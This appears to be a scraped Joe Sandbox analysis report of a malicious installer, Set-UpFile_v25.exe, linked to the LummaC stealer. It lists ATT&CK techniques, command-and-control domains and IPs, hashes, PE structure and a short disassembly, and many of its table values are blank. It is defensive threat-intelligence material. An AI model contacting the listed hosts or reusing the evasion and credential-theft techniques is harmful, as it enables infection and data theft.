Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior |
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior |
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior |
Source: | Directory queried: | Jump to behavior | ||
Source: | Directory queried: | Jump to behavior | ||
Source: | Directory queried: | Jump to behavior | ||
Source: | Directory queried: | Jump to behavior | ||
Source: | Directory queried: | Jump to behavior | ||
Source: | Directory queried: | Jump to behavior | ||
Source: | Directory queried: | Jump to behavior | ||
Source: | Directory queried: | Jump to behavior | ||
Source: | Directory queried: | Jump to behavior | ||
Source: | Directory queried: | Jump to behavior | ||
Source: | Directory queried: | Jump to behavior | ||
Source: | Directory queried: | Jump to behavior | ||
Source: | Directory queried: | Jump to behavior | ||
Source: | Directory queried: | Jump to behavior | ||
Source: | Directory queried: | Jump to behavior | ||
Source: | Directory queried: | Jump to behavior | ||
Source: | Directory queried: | Jump to behavior | ||
Source: | Directory queried: | Jump to behavior | ||
Source: | Directory queried: | Jump to behavior | ||
Source: | Directory queried: | Jump to behavior | ||
Source: | Directory queried: | Jump to behavior | ||
Source: | Directory queried: | Jump to behavior | ||
Source: | Directory queried: | Jump to behavior | ||
Source: | Directory queried: | Jump to behavior | ||
Source: | Directory queried: | Jump to behavior | ||
Source: | Directory queried: | Jump to behavior | ||
Source: | Directory queried: | Jump to behavior | ||
Source: | Directory queried: | Jump to behavior | ||
Source: | Directory queried: | Jump to behavior | ||
Source: | Directory queried: | Jump to behavior | ||
Source: | Directory queried: | Jump to behavior | ||
Source: | Directory queried: | Jump to behavior | ||
Source: | Directory queried: | Jump to behavior | ||
Source: | Directory queried: | Jump to behavior | ||
Source: | Directory queried: | Jump to behavior | ||
Source: | Directory queried: | Jump to behavior | ||
Source: | Directory queried: | Jump to behavior | ||
Source: | Directory queried: | Jump to behavior | ||
Source: | Directory queried: | Jump to behavior | ||
Source: | Directory queried: | Jump to behavior | ||
Source: | Directory queried: | Jump to behavior | ||
Source: | Directory queried: | Jump to behavior | ||
Source: | Directory queried: | Jump to behavior | ||
Source: | Directory queried: | Jump to behavior | ||
Source: | Directory queried: | Jump to behavior | ||
Source: | Directory queried: | Jump to behavior | ||
Source: | Directory queried: | Jump to behavior | ||
Source: | Directory queried: | Jump to behavior | ||
Source: | Directory queried: | Jump to behavior | ||
Source: | Directory queried: | Jump to behavior | ||
Source: | Directory queried: | Jump to behavior | ||
Source: | Directory queried: | Jump to behavior | ||
Source: | Directory queried: | Jump to behavior | ||
Source: | Directory queried: | Jump to behavior | ||
Source: | Directory queried: | Jump to behavior | ||
Source: | Directory queried: | Jump to behavior | ||
Source: | Directory queried: | Jump to behavior | ||
Source: | Directory queried: | Jump to behavior | ||
Source: | Directory queried: | Jump to behavior | ||
Source: | Directory queried: | Jump to behavior | ||
Source: | Directory queried: | Jump to behavior | ||
Source: | Directory queried: | Jump to behavior | ||
Source: | Directory queried: | Jump to behavior | ||
Source: | Directory queried: | Jump to behavior | ||
Source: | Directory queried: | Jump to behavior | ||
Source: | Directory queried: | Jump to behavior | ||
Source: | Directory queried: | Jump to behavior | ||
Source: | Directory queried: | Jump to behavior | ||
Source: | Directory queried: | Jump to behavior | ||
Source: | Directory queried: | Jump to behavior | ||
Source: | Directory queried: | Jump to behavior | ||
Source: | Directory queried: | Jump to behavior | ||
Source: | Directory queried: | Jump to behavior | ||
Source: | Directory queried: | Jump to behavior | ||
Source: | Directory queried: | Jump to behavior | ||
Source: | Directory queried: | Jump to behavior | ||
Source: | Directory queried: | Jump to behavior | ||
Source: | Directory queried: | Jump to behavior | ||
Source: | Directory queried: | Jump to behavior | ||
Source: | Directory queried: | Jump to behavior | ||
Source: | Directory queried: | Jump to behavior | ||
Source: | Directory queried: | Jump to behavior | ||
Source: | Directory queried: | Jump to behavior |
Source: | File source: |
Remote Access Functionality |
---|
Source: | File source: | ||
Source: | File source: |
Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact |
---|---|---|---|---|---|---|---|---|---|---|---|---|---|
Gather Victim Identity Information | Acquire Infrastructure | Valid Accounts | 12 Windows Management Instrumentation | 1 DLL Side-Loading | 1 Process Injection | 221 Virtualization/Sandbox Evasion | 2 OS Credential Dumping | 221 Security Software Discovery | Remote Services | 1 Archive Collected Data | 11 Encrypted Channel | Exfiltration Over Other Network Medium | Abuse Accessibility Features |
Credentials | Domains | Default Accounts | 12 Command and Scripting Interpreter | Boot or Logon Initialization Scripts | 1 DLL Side-Loading | 1 Process Injection | LSASS Memory | 221 Virtualization/Sandbox Evasion | Remote Desktop Protocol | 41 Data from Local System | 1 Ingress Tool Transfer | Exfiltration Over Bluetooth | Network Denial of Service |
Email Addresses | DNS Server | Domain Accounts | 2 PowerShell | Logon Script (Windows) | Logon Script (Windows) | 11 Deobfuscate/Decode Files or Information | Security Account Manager | 2 Process Discovery | SMB/Windows Admin Shares | Data from Network Shared Drive | 3 Non-Application Layer Protocol | Automated Exfiltration | Data Encrypted for Impact |
Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | Login Hook | 3 Obfuscated Files or Information | NTDS | 1 Application Window Discovery | Distributed Component Object Model | Input Capture | 114 Application Layer Protocol | Traffic Duplication | Data Destruction |
Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | 1 DLL Side-Loading | LSA Secrets | 1 File and Directory Discovery | SSH | Keylogging | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact |
Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | Steganography | Cached Domain Credentials | 32 System Information Discovery | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop |
This section contains all screenshots as thumbnails, including those not shown in the slideshow.
Source | Detection | Scanner | Label | Link |
---|---|---|---|---|
100% | Avira URL Cloud | malware | ||
0% | Avira URL Cloud | safe | ||
0% | Avira URL Cloud | safe | ||
0% | Avira URL Cloud | safe | ||
0% | Avira URL Cloud | safe | ||
0% | Avira URL Cloud | safe | ||
100% | Avira URL Cloud | malware | ||
100% | Avira URL Cloud | malware | ||
0% | Avira URL Cloud | safe | ||
0% | Avira URL Cloud | safe | ||
0% | Avira URL Cloud | safe | ||
0% | Avira URL Cloud | safe | ||
0% | Avira URL Cloud | safe | ||
0% | Avira URL Cloud | safe | ||
100% | Avira URL Cloud | malware | ||
0% | Avira URL Cloud | safe | ||
0% | Avira URL Cloud | safe | ||
100% | Avira URL Cloud | malware | ||
0% | Avira URL Cloud | safe | ||
100% | Avira URL Cloud | malware | ||
0% | Avira URL Cloud | safe | ||
0% | Avira URL Cloud | safe | ||
0% | Avira URL Cloud | safe | ||
0% | Avira URL Cloud | safe |
Name | IP | Active | Malicious | Antivirus Detection | Reputation |
---|---|---|---|---|---|
cegu.shop | 185.161.251.21 | true | false | high | |
beattalkerz.cyou | 104.21.25.52 | true | true | unknown | |
dfgh.online | unknown | unknown | false | high | |
klipvumisui.shop | unknown | unknown | false | high |
Name | Malicious | Antivirus Detection | Reputation |
---|---|---|---|
true |
| unknown | |
false | high | ||
false | high | ||
true |
| unknown | |
false | high | ||
false | high | ||
false | high | ||
false | high | ||
false | high | ||
false | high | ||
false | high |
Name | Source | Malicious | Antivirus Detection | Reputation |
---|---|---|---|---|
false | high | |||
false |
| unknown | ||
false | high | |||
false |
| unknown | ||
false | high | |||
false | high | |||
false |
| unknown | ||
false | high | |||
false | high | |||
false | high | |||
false |
| unknown | ||
false | high | |||
false |
| unknown | ||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false |
| unknown | ||
false |
| unknown | ||
false | high | |||
false |
| unknown | ||
false |
| unknown | ||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false |
| unknown | ||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false |
| unknown | ||
false | high | |||
false | high | |||
false |
| unknown | ||
false | high | |||
false | high | |||
false |
| unknown | ||
false | high | |||
false |
| unknown | ||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false |
| unknown | ||
false | high | |||
false | high | |||
false |
| unknown | ||
false | high | |||
false |
| unknown | ||
false |
| unknown | ||
false | high | |||
false | high | |||
false |
| unknown | ||
false |
| unknown | ||
false | unknown | |||
false | high | |||
false | high | |||
false |
| unknown | ||
false | high | |||
false |
| unknown |
- No. of IPs < 25%
- 25% < No. of IPs < 50%
- 50% < No. of IPs < 75%
- 75% < No. of IPs
IP | Domain | Country | Flag | ASN | ASN Name | Malicious |
---|---|---|---|---|---|---|
185.161.251.21 | cegu.shop | United Kingdom | 5089 | NTLGB | false | |
104.21.25.52 | beattalkerz.cyou | United States | 13335 | CLOUDFLARENETUS | true |
Joe Sandbox version: | 41.0.0 Charoite |
Analysis ID: | 1585343 |
Start date and time: | 2025-01-07 14:36:10 +01:00 |
Joe Sandbox product: | CloudBasic |
Overall analysis duration: | 0h 4m 28s |
Hypervisor based Inspection enabled: | false |
Report type: | full |
Cookbook file name: | default.jbs |
Analysis system description: | Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01 |
Number of analysed new started processes analysed: | 6 |
Number of new started drivers analysed: | 0 |
Number of existing processes analysed: | 0 |
Number of existing drivers analysed: | 0 |
Number of injected processes analysed: | 0 |
Technologies: |
|
Analysis Mode: | default |
Analysis stop reason: | Timeout |
Sample name: | Set-UpFile_v25.exe |
Detection: | MAL |
Classification: | mal100.troj.spyw.evad.winEXE@4/3@4/2 |
EGA Information: |
|
HCA Information: |
|
Cookbook Comments: |
|
- Exclude process from analysis (whitelisted): MpCmdRun.exe, SIHClient.exe, conhost.exe
- Excluded IPs from analysis (whitelisted): 172.202.163.200, 13.107.246.45
- Excluded domains from analysis (whitelisted): slscr.update.microsoft.com, otelrules.azureedge.net, fe3cr.delivery.mp.microsoft.com
- Execution Graph export aborted for target powershell.exe, PID 7596 because it is empty
- Not all processes where analyzed, report is missing behavior information
- Report size getting too big, too many NtOpenFile calls found.
- Report size getting too big, too many NtOpenKeyEx calls found.
- Report size getting too big, too many NtQueryValueKey calls found.
- Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
- VT rate limit hit for: Set-UpFile_v25.exe
Time | Type | Description |
---|---|---|
08:37:11 | API Interceptor | |
08:37:29 | API Interceptor |
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context |
---|---|---|---|---|---|---|
185.161.251.21 | Get hash | malicious | LummaC | Browse | ||
Get hash | malicious | LummaC | Browse | |||
Get hash | malicious | LummaC | Browse | |||
Get hash | malicious | LummaC Stealer | Browse | |||
Get hash | malicious | LummaC | Browse | |||
Get hash | malicious | LummaC | Browse | |||
Get hash | malicious | LummaC | Browse | |||
Get hash | malicious | LummaC | Browse | |||
Get hash | malicious | LummaC | Browse | |||
104.21.25.52 | Get hash | malicious | Unknown | Browse |
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context |
---|---|---|---|---|---|---|
cegu.shop | Get hash | malicious | LummaC | Browse |
| |
Get hash | malicious | LummaC | Browse |
| ||
Get hash | malicious | LummaC | Browse |
| ||
Get hash | malicious | LummaC Stealer | Browse |
| ||
Get hash | malicious | LummaC | Browse |
| ||
Get hash | malicious | LummaC | Browse |
| ||
Get hash | malicious | LummaC | Browse |
| ||
Get hash | malicious | LummaC | Browse |
| ||
Get hash | malicious | LummaC | Browse |
|
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context |
---|---|---|---|---|---|---|
NTLGB | Get hash | malicious | LummaC | Browse |
| |
Get hash | malicious | Mirai | Browse |
| ||
Get hash | malicious | LummaC | Browse |
| ||
Get hash | malicious | LummaC | Browse |
| ||
Get hash | malicious | HTMLPhisher | Browse |
| ||
Get hash | malicious | LummaC | Browse |
| ||
Get hash | malicious | LummaC Stealer | Browse |
| ||
Get hash | malicious | LummaC | Browse |
| ||
Get hash | malicious | LummaC | Browse |
| ||
CLOUDFLARENETUS | Get hash | malicious | LummaC | Browse |
| |
Get hash | malicious | CAPTCHA Scam ClickFix | Browse |
| ||
Get hash | malicious | Metasploit | Browse |
| ||
Get hash | malicious | PureLog Stealer, Snake Keylogger | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | HTMLPhisher | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | LummaC, Amadey, LummaC Stealer, PureLog Stealer, Stealc | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | DBatLoader, PureLog Stealer, Snake Keylogger, VIP Keylogger | Browse |
|
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context |
---|---|---|---|---|---|---|
a0e9f5d64349fb13191bc781f81f42e1 | Get hash | malicious | LummaC | Browse |
| |
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | LummaC | Browse |
| ||
Get hash | malicious | LummaC, PrivateLoader | Browse |
| ||
Get hash | malicious | LummaC | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | Unknown | Browse |
|
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Download File
Process: | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 64 |
Entropy (8bit): | 1.1510207563435464 |
Encrypted: | false |
SSDEEP: | 3:NlllulPki/llllZ:NllUcylll |
MD5: | D8D47FD6FA3E199E4AFF68B91F1D04A8 |
SHA1: | 788625E414B030E5174C5BE7262A4C93502C2C21 |
SHA-256: | 2D9AF9AB25D04D1CF9B25DB196A988CD6E4124C1B8E185B96F2AB9554F4A6738 |
SHA-512: | 5BFD83D07DC3CB53563F215BE1D4D7206340A4C0AB06988697637C402793146D13CDDE0E27DC8301E4506553D957876AC9D7A7BF3C7431BBDD5F019C17AB0A58 |
Malicious: | false |
Reputation: | moderate, very likely benign file |
Preview: |
Process: | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 60 |
Entropy (8bit): | 4.038920595031593 |
Encrypted: | false |
SSDEEP: | 3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX |
MD5: | D17FE0A3F47BE24A6453E9EF58C94641 |
SHA1: | 6AB83620379FC69F80C0242105DDFFD7D98D5D9D |
SHA-256: | 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7 |
SHA-512: | 5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82 |
Malicious: | false |
Reputation: | high, very likely benign file |
Preview: |
Process: | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 60 |
Entropy (8bit): | 4.038920595031593 |
Encrypted: | false |
SSDEEP: | 3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX |
MD5: | D17FE0A3F47BE24A6453E9EF58C94641 |
SHA1: | 6AB83620379FC69F80C0242105DDFFD7D98D5D9D |
SHA-256: | 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7 |
SHA-512: | 5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82 |
Malicious: | false |
Reputation: | high, very likely benign file |
Preview: |
File type: | |
Entropy (8bit): | 0.5144643785072911 |
TrID: |
|
File name: | Set-UpFile_v25.exe |
File size: | 75'060'322 bytes |
MD5: | 2f33775c502e7b2d60b9bfe944b46863 |
SHA1: | 57d023419ecbe81d27368757fea4366de68891ea |
SHA256: | fce2d6446420934b428053edf66b7cc5838717fbf67911c11145424ebd0a045b |
SHA512: | afd577d935d151cff6eae652be7f362bc29e89df5a2166bf9cf56f6acbbc57626abe3a970b765b4bb1e079e5bf8a41e4cb440f2a23913d43ca5631c5cfb54acf |
SSDEEP: | 24576:otdAm9DUi/CR3wCkCiRgoG7hBaHkbEXaeG/jFt5xTx9CAaui1CgqU8Expi0Sy4YF:YqTytRFkDek1XFaumfq16E0nZpd |
TLSH: | 1DF7C1297600A1A1B7D2BFFD490393CA9AA6E108B33134FF155E270ADD3B5D8433765A |
File Content Preview: | MZP.....................@.......................InUn....................!..L.!..This program must be run under Win32..$7....................................................................................................................................... |
Icon Hash: | 2d2e3797b32b2b99 |
Entrypoint: | 0x50156c |
Entrypoint Section: | .itext |
Digitally signed: | true |
Imagebase: | 0x400000 |
Subsystem: | windows gui |
Image File Characteristics: | RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI |
DLL Characteristics: | NX_COMPAT, TERMINAL_SERVER_AWARE |
Time Stamp: | 0x57051F89 [Wed Apr 6 14:39:05 2016 UTC] |
TLS Callbacks: | |
CLR (.Net) Version: | |
OS Version Major: | 5 |
OS Version Minor: | 0 |
File Version Major: | 5 |
File Version Minor: | 0 |
Subsystem Version Major: | 5 |
Subsystem Version Minor: | 0 |
Import Hash: | f62b90e31eca404f228fcf7068b00f31 |
Signature Valid: | false |
Signature Issuer: | CN=VeriSign Class 3 Code Signing 2010 CA, OU=Terms of use at https://www.verisign.com/rpa (c)10, OU=VeriSign Trust Network, O="VeriSign, Inc.", C=US |
Signature Validation Error: | The digital signature of the object did not verify |
Error Number: | -2146869232 |
Not Before, Not After |
|
Subject Chain |
|
Version: | 3 |
Thumbprint MD5: | F7219078FBE20BC1B98BF8A86BFC0396 |
Thumbprint SHA-1: | 30632EA310114105969D0BDA28FDCE267104754F |
Thumbprint SHA-256: | 1B5061CF61C93822BDE2433156EEBE1F027C8FA9C88A4AF0EBD1348AF79C61E2 |
Serial: | 14781BC862E8DC503A559346F5DCC518 |
Instruction |
---|
push ebp |
mov ebp, esp |
add esp, FFFFFFF0h |
push ebx |
push esi |
push edi |
mov eax, 004FEBF4h |
call 00007F218C420B12h |
push FFFFFFECh |
mov eax, dword ptr [00504E38h] |
mov eax, dword ptr [eax] |
mov ebx, dword ptr [eax+00000170h] |
push ebx |
call 00007F218C4219BDh |
and eax, FFFFFF7Fh |
push eax |
push FFFFFFECh |
mov eax, dword ptr [00504E38h] |
push ebx |
call 00007F218C421C12h |
xor eax, eax |
push ebp |
push 005015E7h |
push dword ptr fs:[eax] |
mov dword ptr fs:[eax], esp |
push 00000001h |
call 00007F218C42135Dh |
call 00007F218C5164BCh |
mov eax, dword ptr [004FE82Ch] |
push eax |
push 004FE890h |
mov eax, dword ptr [00504E38h] |
mov eax, dword ptr [eax] |
call 00007F218C493F51h |
call 00007F218C516510h |
xor eax, eax |
pop edx |
pop ecx |
pop ecx |
mov dword ptr fs:[eax], edx |
jmp 00007F218C51915Bh |
jmp 00007F218C41C239h |
call 00007F218C51628Ch |
mov eax, 00000001h |
call 00007F218C41CCFAh |
call 00007F218C41C67Dh |
mov eax, dword ptr [00504E38h] |
mov eax, dword ptr [eax] |
mov edx, 0050177Ch |
call 00007F218C493A5Ch |
push 00000005h |
mov eax, dword ptr [00504E38h] |
mov eax, dword ptr [eax] |
mov eax, dword ptr [eax+00000170h] |
push eax |
call 00007F218C421BD3h |
mov eax, dword ptr [00504E38h] |
mov eax, dword ptr [eax] |
mov edx, dword ptr [004D9740h] |
Name | Virtual Address | Virtual Size | Is in Section |
---|---|---|---|
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 | |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x10d000 | 0x3840 | .idata |
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x113000 | 0x6d600 | .rsrc |
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 | |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x4791aa2 | 0x39c0 | |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x0 | 0x0 | |
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 | |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 | |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 | |
IMAGE_DIRECTORY_ENTRY_TLS | 0x112000 | 0x18 | .rdata |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 | |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 | |
IMAGE_DIRECTORY_ENTRY_IAT | 0x10da80 | 0x88c | .idata |
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 | |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 | |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics |
---|---|---|---|---|---|---|---|---|---|
.text | 0x1000 | 0xfe084 | 0xfe200 | ef1b62ba5d0b70ba5c2cfd64e2c11839 | False | 0.4838360412567634 | data | 6.484873057389425 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ |
.itext | 0x100000 | 0x1788 | 0x1800 | 030d751d7e20e11f863bdb27a950c708 | False | 0.5203450520833334 | data | 5.94899155660316 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ |
.data | 0x102000 | 0x3068 | 0x3200 | 2f90c6f68c18651f5b580d5ad2b852e9 | False | 0.421796875 | data | 4.334644118113417 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE |
.bss | 0x106000 | 0x6194 | 0x0 | d41d8cd98f00b204e9800998ecf8427e | False | 0 | empty | 0.0 | IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE |
.idata | 0x10d000 | 0x3840 | 0x3a00 | e31e730fc86b9dac8932bd3f92752751 | False | 0.31041217672413796 | data | 5.202469592139362 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE |
.tls | 0x111000 | 0x3c | 0x0 | d41d8cd98f00b204e9800998ecf8427e | False | 0 | empty | 0.0 | IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE |
.rdata | 0x112000 | 0x18 | 0x200 | d6264f4705ad03600aa29f24c89eb799 | False | 0.05078125 | MacBinary, Mon Feb 6 07:28:16 2040 INVALID date, modified Mon Feb 6 07:28:16 2040 "Q" | 0.20544562813451883 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ |
.rsrc | 0x113000 | 0x6d600 | 0x6d600 | 1b67589f903edb38a6f0dd56d6b97683 | False | 0.5853459821428572 | data | 7.319003457622621 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ |
Name | RVA | Size | Type | Language | Country | ZLIB Complexity |
---|---|---|---|---|---|---|
RT_CURSOR | 0x113c44 | 0x134 | Targa image data - Map 64 x 65536 x 1 +32 "\001" | English | United States | 0.38636363636363635 |
RT_CURSOR | 0x113d78 | 0x134 | data | English | United States | 0.4642857142857143 |
RT_CURSOR | 0x113eac | 0x134 | data | English | United States | 0.4805194805194805 |
RT_CURSOR | 0x113fe0 | 0x134 | data | English | United States | 0.38311688311688313 |
RT_CURSOR | 0x114114 | 0x134 | data | English | United States | 0.36038961038961037 |
RT_CURSOR | 0x114248 | 0x134 | data | English | United States | 0.4090909090909091 |
RT_CURSOR | 0x11437c | 0x134 | Targa image data - RGB 64 x 65536 x 1 +32 "\001" | English | United States | 0.4967532467532468 |
RT_BITMAP | 0x1144b0 | 0x4e8 | Device independent bitmap graphic, 48 x 48 x 4, image size 1152 | 0.2945859872611465 | ||
RT_BITMAP | 0x114998 | 0xe8 | Device independent bitmap graphic, 16 x 16 x 4, image size 128 | 0.521551724137931 | ||
RT_ICON | 0x114a80 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 192 | English | United States | 0.5675675675675675 |
RT_ICON | 0x114ba8 | 0x568 | Device independent bitmap graphic, 16 x 32 x 8, image size 320 | English | United States | 0.4486994219653179 |
RT_ICON | 0x115110 | 0x2e8 | Device independent bitmap graphic, 32 x 64 x 4, image size 640 | English | United States | 0.4637096774193548 |
RT_ICON | 0x1153f8 | 0x8a8 | Device independent bitmap graphic, 32 x 64 x 8, image size 1152 | English | United States | 0.3935018050541516 |
RT_STRING | 0x115ca0 | 0xec | data | 0.6059322033898306 | ||
RT_STRING | 0x115d8c | 0x250 | data | 0.47466216216216217 | ||
RT_STRING | 0x115fdc | 0x28c | data | 0.4647239263803681 | ||
